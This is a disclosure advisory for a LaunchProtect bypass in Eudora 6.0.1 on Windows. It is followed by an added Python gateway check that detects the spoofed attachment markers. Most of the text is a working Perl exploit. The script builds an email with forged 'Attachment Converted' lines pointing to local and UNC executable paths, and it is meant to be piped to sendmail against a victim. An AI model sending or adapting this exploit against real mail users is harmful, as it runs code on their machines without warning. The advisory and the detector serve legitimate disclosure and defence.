Eudora LaunchProtect Bypassing
Summary
Eudora (on Windows) has a feature called LaunchProtect, which warns the user before running executable attachments. However, this only works in the attach folder; using spoofed attachments, executables stored elsewhere may run without warning. In some setups, even executables in the attach folder may run without warning.
Credit:
The information has been provided by Paul Szabo.
Details
Vulnerable systems:
* Eudora version 6.0.1
Exploit:
#!/usr/bin/perl --
use MIME::Base64;
# Mail headers, then a blank line to start the body
print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n";
print "\n";
print "Pipe the output of this script into: sendmail -i victim\n";
print "
Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach
directory only, and allows spoofed attachments pointing to an executable
stored elsewhere to run without warning:\n";
print "Attachment Converted\r: <a href=c:/winnt/system32/calc>go.txt</a>\n";
print "Attachment Converted\r: c:/winnt/system32/calc\n";
$X = 'README'; $Y = "$X.bat";
print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n";
$z = "rem Funny joke\r\npause\r\n";
# pack('u', ...) uuencodes the attachment body
print "begin 600 $X\n", pack('u',$z), "`\nend\n";
print "\nand (in another message or) after some blurb so is scrolled off in
another screenful, also send $Y. Clicking on $X does not
get it any more (but gets $Y, with a LaunchProtect warning):\n";
$z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n";
print "begin 600 $Y\n", pack('u',$z), "`\nend\n";
print "
Can be exploited if there is more than one way into attach: in my setup
H: and \\\\rome\\home are the same thing, but Eudora does not know that.\n";
print "These elicit warnings:\n";
print "Attachment Converted\r: <a href=h:/eudora/attach/README>readme</a>\n";
print "Attachment Converted\r: h:/eudora/attach/README\n";
print "while these do the bad thing without warning:\n";
print "Attachment Converted\r: <a href=file://rome/home/eudora/attach/README>readme</a>\n";
print "Attachment Converted\r: //rome/home/eudora/attach/README\n";
print "Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\n";
print "
For the default setup, Eudora knows that C:\\Program Files
and C:\\Progra~1 are the same thing...\n";
print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n";
print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n";
print "\n";
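
Added example (not part of the original advisory or of Paul Szabo's script): a gateway-side check that flags inbound messages whose body text carries the "Attachment Converted" lines the script above emits, and names the path form of each target. It assumes that Eudora writes this marker itself, locally, when it saves an attachment, so any occurrence in inbound mail is treated as spoofed; the function names and the sample message are constructed for illustration.

```python
import re
from email import message_from_bytes

# Marker as the script emits it: "Attachment Converted", an optional bare CR,
# ":" and then the target as an href, a quoted path, or a bare path.
MARKER = re.compile(
    rb'Attachment Converted\r?:\s*'
    rb'(?:<a\s+href=["\']?([^"\'>\s]+)|"([^"]+)"|(\S+))',
    re.IGNORECASE)

def classify(target):
    """Name the path form; the advisory shows the warning depends on it."""
    t = target.replace('\\', '/').lower()
    if t.startswith('file:'):
        return 'file-url'
    if t.startswith('//'):
        return 'unc'
    if re.match(r'[a-z]:/', t):
        return 'drive-path'
    return 'other'

def find_spoofed_attachments(raw):
    """Return [(target, kind)] for each marker in the text parts of raw."""
    hits = []
    for part in message_from_bytes(raw).walk():
        if part.get_content_maintype() != 'text':
            continue
        body = part.get_payload(decode=True) or b''
        for m in MARKER.finditer(body):
            target = next(g for g in m.groups() if g).decode('latin-1')
            hits.append((target, classify(target)))
    return hits

# Constructed sample message; the three targets are taken from the advisory.
SAMPLE = (
    b'From: a@example.test\r\nTo: b@example.test\r\nSubject: sample\r\n\r\n'
    b'Attachment Converted\r: <a href=c:/winnt/system32/calc>go.txt</a>\r\n'
    b'Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\r\n'
    b'Attachment Converted: "c:/program files/qualcomm/eudora/attach/README"\r\n')

if __name__ == '__main__':
    for target, kind in find_spoofed_attachments(SAMPLE):
        print(f'quarantine candidate: {kind:10} {target}')
```

Because the content-transfer-encoding is decoded before matching, the same check also catches the marker inside base64 or quoted-printable text parts.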